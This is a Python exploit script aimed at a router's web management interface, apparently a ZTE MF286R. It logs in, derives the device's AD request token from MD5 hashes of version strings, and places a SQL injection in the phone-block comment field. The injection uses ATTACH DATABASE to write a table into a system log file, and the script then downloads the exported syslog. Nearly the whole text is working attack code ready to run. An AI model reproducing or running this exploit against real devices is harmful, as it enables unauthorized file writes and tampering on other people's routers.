exploit.py

import time
import requests
import hashlib
import sys
import base64

wa_inner_version = "BD_POSTEMF286RMODULEV1.0.0B12"
cr_version = "CR_ITPOSTEMF286RV1.0.0B10"

FORM = lambda x: {"isTest": False, "goformId": x}

s = requests.Session()


def login():
    data = FORM("LOGIN")
    data["password"] = PASSWD

    status = s.post(
        f"{HOST}/goform/goform_set_cmd_process",
        headers=HDRS,
        data=data,
    ).json()

    login_status = "[+] Login: "
    login_status += "success" if status["result"] == "0" else "fail"

    print(login_status)


def get_AD():
    def md5(s):
        m = hashlib.md5()
        m.update(s.encode("utf-8"))
        return m.hexdigest()

    a = md5(wa_inner_version + cr_version)

    rd = requests.get(
        f"{HOST}/goform/goform_get_cmd_process?isTest=false&cmd=RD&_={int(time.time())}",
        headers=HDRS,
    )

    return md5(a + rd.json()["RD"])


def get_response(server_resp):
    status = "[+] payload injected: "

    if "success" in server_resp.text:
        status += "success"

    else:
        status += "fail"

    print(status)


def sqli():

    target = "/var/log/webshow_messages"

    hostname_form = FORM("PHONE_BLOCK_ADD")

    hostname_form["block_number"] = "testestesttest"
    hostname_form[
        "block_comment"
    ] = f"test'); ATTACH DATABASE '{target}' AS t; CREATE TABLE t.pwn (dataz text);INSERT INTO t.pwn (dataz) VALUES ('testestesttest');--"

    hostname_form["AD"] = get_AD()

    a = s.post(
        f"{HOST}/goform/goform_set_cmd_process",
        headers=HDRS,
        data=hostname_form,
    )

    get_response(a)


def get_log():

    logs = s.get(f"{HOST}/cgi-bin/ExportSyslog.sh", headers=HDRS)

    if len(logs.text) > 0:
        print(logs.text)

        print("[+] Logs written into last-log.txt")

        with open("last-log.txt", "w") as logf:
            logf.write(logs.text)


if __name__ == "__main__":

    if len(sys.argv) < 3:
        print("usage: python3 run.py http://<router_ip> <admin_password>")
        sys.exit(0)

    HOST = sys.argv[1]

    HDRS = {
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        "Origin": HOST,
        "Referer": f"{HOST}/index.html",
    }

    PASSWD = base64.b64encode(sys.argv[2].encode()).decode()

    login()

    sqli()
    get_log()